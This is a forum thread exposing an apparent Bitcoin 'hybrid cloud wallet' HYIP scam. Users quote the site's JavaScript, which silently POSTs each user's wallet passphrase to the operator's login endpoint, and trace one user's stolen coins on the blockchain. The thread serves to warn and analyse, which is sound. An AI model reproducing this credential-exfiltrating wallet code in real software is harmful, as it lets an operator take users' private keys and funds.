Btc-Banker.Com new hybrid cloud, safe and profitable wallet - page 3.

BurtW

legendary

Activity: 2646

Merit: 1137

All paid signature campaigns should be banned.

Why are you even here on this forum? Why waste your time? Even with not one single deposit from the people on these forums, at your current growth rate, in a few months every single person who has any Bitcoins will be your customer:

Quote

6594 members with over 1905.6817307692 bitcoins are trusting us!
6595 members with over 1905.7258461538 bitcoins are trusting us!
6597 members with over 1905.8140769231 bitcoins are trusting us!
6599 members with over 1931.8677884615 bitcoins are trusting us!
...
6608 members with over 1934.6846153846 bitcoins are trusting us!
6614 members with over 1935.9365384615 bitcoins are trusting us!
6981 members with over 1964.3635384615 bitcoins are trusting us!
...
7049 members with over 2003.5093846154 bitcoins are trusting us!
7052 members with over 2003.7389038462 bitcoins are trusting us!
7052 members with over 2003.7848076923 bitcoins are trusting us!
...
7091 members with over 2034.4256846154 bitcoins are trusting us!
7092 members with over 2034.5648269231 bitcoins are trusting us!
7092 members with over 2034.6112076923 bitcoins are trusting us!

That is not fast enough for you? Do you really have the infrastructure (servers, personel) to handle a higher growth rate than is shown on the statistics from your web site?

BurtW

legendary

Activity: 2646

Merit: 1137

All paid signature campaigns should be banned.

Quote from: ?? on ??

3. BurtW - again, for sure is a non-sense to scam you for 0,2 btc - you was the single, until now who posted a analysis, a real opinion about btc-banker, after u really tried our services... is non-sense, so for sure your coins was not lost from our part, i personally think that YOU sent it to other address, after you analised the code, without to wait my technical answer. Please be fair !

I agree. It makes no sense so I am very puzzled as to how or why my BTC were stolen. Half of them (0.0999 BTC) are still just sitting here:

https://blockchain.info/address/19ZUbFwYEk67oLzUXYMnmjTda8qCzWWrHe

The other half have been laundered.

NONE OF THIS REALLY MATTERS.

Let's just put asside for the moment your 3% per day HYIP and the fact that I already actually lost my BTC, for whatever reason, and focus on one indisputable fact.

You have the private keys of every one of your customers (however many you actually have).

Due to this it is 100% certain that at some point in the future your system will lose a huge number of your customer's Bitcoins either to an external hack or an internal "hack".

The old timers around here have seen this dozens of times. It is so common we have a name for it. We call it the "sorry we got hacked" exit strategy. Trade Fortress (Free Hugs) can tell you all about it.

Until your code is fixed (and many other things change) I cannot even begin to imagine the possibility of using, let alone recommending, your service.

devthedev

legendary

Activity: 1050

Merit: 1004

Quote from: ?? on ??

devthedev 3- we have at least 450-500 ACTIVE member
4: 0,1 btc is today around 65 usd, probable the domain and hosting cost more, so non sense.

Do you have any proof of these members?

devthedev

legendary

Activity: 1050

Merit: 1004

Quote from: ?? on ??

1.as i said all time scammer call scam - Free hugs! ♥ please check your rating "Trust: -464: -16 / +26(26) Warning: Trade with extreme caution! "
2. devthedev - i am not Mr. Weiss, he is one of our investment companys founder.
3. BurtW - again, for sure is a non-sense to scam you for 0,2 btc - you was the single, until now who posted a analysis, a real opinion about btc-banker, after u really tried our services... is non-sense, so for sure your coins was not lost from our part, i personally think that YOU sent it to other address, after you analised the code, without to wait my technical answer. Please be fair !
4.Although we have many hater here ,we are still here, we still pay the daily 3% promo profit and still no evidence that we scammed somebody. Be sure if we scammed our users, this forum will be full with negative review - but is NOT.

1. I think TF knows what the definition of a scammer is -_-
2. Sure
3. He's the only one that's given an analysis because he wanted to give solid evidence of the scam that this is. Nobody else has deposited.
4. You've only had the opportunity to scam one because he's the only one that's deposited...

🏰 TradeFortress 🏰

vip

Activity: 1316

Merit: 1043

👻

It is blatantly obvious that they are a scam. You are just giving them free bumps now.

devthedev

legendary

Activity: 1050

Merit: 1004

Mr. Weiss, leave the forum. No need for your scam here.
Also, looks like fake Whois info on your domain?

BurtW

legendary

Activity: 2646

Merit: 1137

All paid signature campaigns should be banned.

BTW the 10 key pair sequence is actually calculated client side, that code they took from carbonwallet. Here it is, directly from their client code:

Code:

var seed = $('#password').val();
			seed = mn_decode(seed);
			
			Electrum.init(seed, function(r) {
					if(r % 20 == 0)
						$('#seed-progress').css('width', (r + 19) + '%'); 
				}, 
				function(privKey) {
					Electrum.gen(10, function(r) {
						WALLET.getKeys().push(new Bitcoin.ECKey(r[1])); 
						if(WALLET.getKeys().length == 10)
							login_success(); 
					});
				}
			);

The problem is that they also transmit the password back to themselves, carbonwallet does not do that.

BurtW

legendary

Activity: 2646

Merit: 1137

All paid signature campaigns should be banned.

As I suspected this line shows them posting the actual password, the only thing that is necessary to recreate the entire public and private key sequence back to their server.

On their server they can then calculate all 10 of the public keys and Bitcoin addresses they need to be able to pay interest.

They can also spend any Bitcoins kept with them since they can also calculate the private keys from the password that they will have after this post command.

I did not share my password with anyone (well, except the btc-banker folks due to the above POST code).

I used LastPass to create the random 20 character password Hzyi%JkWEc#xi65t#9^x

Check it out. You can go to their web site and enter that for the password and you will get the 10 addresses:

Code:

1Euy5eERuvQKruwCKFPAVp4b3zceYGWPED
18CdWvazvpDnE9rkFPbfXWY5WnAriQKnHs
1M4QVFTsRzrMwzS2oDvb9QQPreDRo5e7Nq
197vv294WFKqwuR5DKuYf8TW35HGF257of
1AAxexhqc7LTYL7byWGky7oK9uzZ7a8VaT
1NciLKr4hfgYuUgSFjerLwfY1ABi4RXJj3
1DujvmjfQrrLozCjdoCS1MF4NCuUaS2S6A
1LyAYmSH13PA96CYnB33Sfjkq6NcM5rC32
19LahEBYhEHeEi4SmUqGvi1jnQzjzrH9rp
1FadVHYWno5ADEd7umSdW76RsA4o8N6ZzM

I only used the first two addresses. All are empty now due to the "hack". There is no way someone could have guessed the password Hzyi%JkWEc#xi65t#9^x

Only I and btc-banker knew the password. I did not move the funds (I was asleep). I conclude they moved them.

ondratra

sr. member

Activity: 350

Merit: 250

Quote from: BurtW on June 05, 2014, 10:41:14 AM

Quote from: ?? on ??

no, nobody from btc-banker take any btc from our members, thats sure ... we make all legit, but as i see we have many hater, thats the life, no problem
we will be still here for our member and we will be forever 100% legit ...

Can anyone explain this small chunk of code to me:

Code:

	$('#open-sesame').click(function(){

		$.ajax({
			url: 'api/login.php',
			type: 'POST',
			dataType: 'json',
			data: 'passphrase='+$('#password').val(),
			success: function(e)
			{

What, exactly, does this line do:

Code:

data: 'passphrase='+$('#password').val(),

Just curious.

First of all thx BurtW for rational stance to all of this. Me and MrWDunne tried to be rational too untill it seemed very fishy and btc-banker started being very unrational. For example avoided signing message with (very low for his claims) 30BTC wallet. We also noticed, that user counts are absolutely unreal.

This js just sends AJAX call to api/login.php with only one POST field 'passphrase' with value $('#password').val() - that is value of input field with id "password" (input should look similiar to ) - basicly there is no "only client side" calculation of wallet private/public keys.

On case of lost of your 0.1BTC - you have shared some passwords here on forum - is it possible you had your BTC on addresses with password published here on forum?

If any other js needs explanation I am here to investigate it (as senior web developer I understand JS, CoffeeScript, etc. very well).

BurtW

legendary

Activity: 2646

Merit: 1137

All paid signature campaigns should be banned.

My BTC are gone. Now, you are not going to answer any more questions. I guess that is it then. Good day.

BurtW

legendary

Activity: 2646

Merit: 1137

All paid signature campaigns should be banned.

Quote from: ?? on ??

no, nobody from btc-banker take any btc from our members, thats sure ... we make all legit, but as i see we have many hater, thats the life, no problem
we will be still here for our member and we will be forever 100% legit ...

Can anyone explain this small chunk of code to me:

Code:

	$('#open-sesame').click(function(){

		$.ajax({
			url: 'api/login.php',
			type: 'POST',
			dataType: 'json',
			data: 'passphrase='+$('#password').val(),
			success: function(e)
			{

What, exactly, does this line do:

Code:

data: 'passphrase='+$('#password').val(),

Just curious.

BurtW

legendary

Activity: 2646

Merit: 1137

All paid signature campaigns should be banned.

Quote from: ?? on ??

for sure is a non-sense to scam you for 0,2 btc - you was the single, until now who posted a analysis, a real opinion about btc-banker, after u really tried our services... is non-sense

You are right, you should not have taken my BTC. You should have taken the BTC from someone else. What is up with that? Did someone over there make a mistake or something?

BurtW

legendary

Activity: 2646

Merit: 1137

All paid signature campaigns should be banned.

Quote from: ?? on ??

BurtW - be honest and say the true, nobody scammed you, you sent to a other address your bitcoins

You do have some balls I will give you that.

What is next for you? Got any plans?

BurtW

legendary

Activity: 2646

Merit: 1137

All paid signature campaigns should be banned.

Quote from: 🏰 TradeFortress 🏰 on June 05, 2014, 09:54:20 AM

Please don't get so emotionally invested in things like this..

You don't know how much that means to us all coming from you.

BTW where are my BTC that got "hacked" from inputs.io? Living high on the hog there?

BurtW

legendary

Activity: 2646

Merit: 1137

All paid signature campaigns should be banned.

My 0.1 BTC was moved off my "safe" deterministic address:

https://blockchain.info/address/1Euy5eERuvQKruwCKFPAVp4b3zceYGWPED

last night while I was asleep, see:

https://blockchain.info/tx/d48826b2515072a73f43c2515403fd96c8c252f6cc6e7018f151a0846000528a

The coins were moved here:

https://blockchain.info/address/17nz37jqtQsvVWoi2AKzhuNrkLhH4D2AtN

then here:

https://blockchain.info/address/17DNktmPsUAbD4pXcewGMHk9yQmJNZ2kUH

then mixed.

At just about the same time, 2014-06-05 10:25:22, my other 0.1 BTC were also moved:

https://blockchain.info/tx/859e9b8777641af8c889e4be8c280f0a8194368bf557d3b40331041a502fed0f

Coins are still here:

https://blockchain.info/address/19ZUbFwYEk67oLzUXYMnmjTda8qCzWWrHe

When they need them to pay interest to someone else they will move them and mix them from there.

🏰 TradeFortress 🏰

vip

Activity: 1316

Merit: 1043

👻

Quote from: BurtW on June 05, 2014, 08:31:14 AM

Quote from: MrWDunne on June 05, 2014, 08:26:56 AM

You deserved to get scammed.

The warning was in big red letters on page one. We explained several times as to why this service is a joke. He couldn't even sign a message or speak proper English.

I hate to say I told you so.

Get off your high horse. I knew I was going to spend that money. It was a service to all those people who were in doubt. I can afford to spend 0.2 BTC that I bought at less than $2/BTC. Your method of screaming works for some. My method proves it to everyone.

Got anything to say for yourself there btc-banker? At least come back and tell us how much you got in total so we can wonder at your hacker skillz. We know you got my 0.2 BTC, was anyone else playing.

Or, he is gone not to return, either way we all win.

Please don't get so emotionally invested in things like this..

BurtW

legendary

Activity: 2646

Merit: 1137

All paid signature campaigns should be banned.

While researching the code of the btc-banker web site I found that almost all of the code was lifted from this web site:

http://carbonwallet.com/app/app.html

Which actually looks like a pretty nice site. It does everything that the btc-banker web site does without the interest scam. Check it out. Does it look familiar or what?

The critical section of code, the one that creates the key pair sequence from the password or pass phrase looks like this on the original web site:

Code:

$('#open-sesame').click(function(){

  var seed = $('#password').val();
  seed = mn_decode(seed);
  Electrum.init(seed, function(r) {
      if(r % 20 == 0)
        $('#seed-progress').css('width', (r + 19) + '%'); 
    }, 
    function(privKey) {
      Electrum.gen(10, function(r) { 
        WALLET.getKeys().push(new Bitcoin.ECKey(r[1])); 
        if(WALLET.getKeys().length == 10)
          login_success(); 
      });
    }
  );
      
  return true;
})

Notice how it simply creates 10 key pairs. However, on the btc-banker web site this function is highly modified:

Code:

$('#open-sesame').click(function(){

	$.ajax({
		url: 'api/login.php',
		type: 'POST',
		dataType: 'json',
		data: 'passphrase='+$('#password').val(),
		success: function(e)
		{
			w_id = e.id;
			can_go = true;

			if (e.unread > 0) {
				$('#unread_count').html('('+e.unread+')')
			}

			if (e.mp == 1) {
				$('[name=old_pass]').removeClass('hidden');
			} else {
				$('[name=old_pass]').addClass('hidden');
			}

			$.ajax({
				url: 'api/commission.php',
				type: 'POST',
				dataType: 'json',
				data: 'w='+w_id,
				success: function(e)
				{
					$('#comm').html(e.comm);
					withdraw_max = e.comm.replace(/0+$/,'');
					withdraw_max = e.comm.replace(/\.+$/,'');
				}
			});

			$.ajax({
				url: 'api/withdraw.php',
				type: 'POST',
				data: 'w='+w_id,
				success: function(e)
				{
					$('#withdraw').html(e);
					$(document).on('click', '#withdraw_btn', function()
					{
						$('#withdrawModal').modal();
						$('#withdrawAmmount').html(withdraw_max);
						$('input[name=withdraw_amount]').val(withdraw_max);
					})
				}
			});

			$(document).on('click', '#withdrawBTC', function()
			{
				var wform = $(this).closest('form').serialize();
				$.ajax({
					url: 'api/withdraw.php',
					type: 'POST',
					data: wform,
					success: function(e)
					{
						$('#withdraw').html(e);
					}
				});
			})

			$.ajax({
				url: 'api/messages.php',
				type: 'POST',
				data: 'w='+w_id,
				success: function(e)
				{
					$('#messages').html(e);
					$(document).on('click', '.send_msg form button.submit', function()
					{
						var wform = $(this).closest('form').serialize();
						$.ajax({
							url: 'api/messages.php',
							type: 'POST',
							data: wform,
							success: function(e)
							{
								$('#messages').html(e);
							}
						});
					});
				}
			});
			
			mn_words = e.seed;

			var seed = $('#password').val();
			seed = mn_decode(seed);
			
			Electrum.init(seed, function(r) {
					if(r % 20 == 0)
						$('#seed-progress').css('width', (r + 19) + '%'); 
				}, 
				function(privKey) {
					Electrum.gen(10, function(r) {
						WALLET.getKeys().push(new Bitcoin.ECKey(r[1])); 
						if(WALLET.getKeys().length == 10)
							login_success(); 
					});
				}
			);
		}
	});
			
	return true;
})

MrWDunne

sr. member

Activity: 322

Merit: 250

Quote from: BurtW on June 05, 2014, 08:31:14 AM

Quote from: MrWDunne on June 05, 2014, 08:26:56 AM

You deserved to get scammed.

The warning was in big red letters on page one. We explained several times as to why this service is a joke. He couldn't even sign a message or speak proper English.

I hate to say I told you so.

Get off your high horse. I knew I was going to spend that money. It was a service to all those people who were in doubt. I can afford to spend 0.2 BTC that I bought at less than $2/BTC. Your method of screaming works for some. My method proves it to everyone.

Got anything to say for yourself there btc-banker? At least come back and tell us how much you got in total so we can wonder at your hacker skillz. We know you got my 0.2 BTC, was anyone else playing.

Or, he is gone not to return, either way we all win.

True, you did do a service. Granted.

The grand total was 0.202BTC

BurtW

legendary

Activity: 2646

Merit: 1137

All paid signature campaigns should be banned.

Quote from: MrWDunne on June 05, 2014, 08:26:56 AM

You deserved to get scammed.

The warning was in big red letters on page one. We explained several times as to why this service is a joke. He couldn't even sign a message or speak proper English.

I hate to say I told you so.

Get off your high horse. I knew I was going to spend that money. It was a service to all those people who were in doubt. I can afford to spend 0.2 BTC that I bought at less than $2/BTC. Your method of screaming works for some. My method proves it to everyone.

Got anything to say for yourself there btc-banker? At least come back and tell us how much you got in total so we can wonder at your hacker skillz. We know you got my 0.2 BTC, was anyone else playing.

Or, he is gone not to return, either way we all win.

MrWDunne

sr. member

Activity: 322

Merit: 250

You deserved to get scammed.

The warning was in big red letters on page one. We explained several times as to why this service is a joke. He couldn't even sign a message or speak proper English.

I hate to say I told you so.

Topic: Btc-Banker.Com new hybrid cloud, safe and profitable wallet - page 3. (Read 12757 times)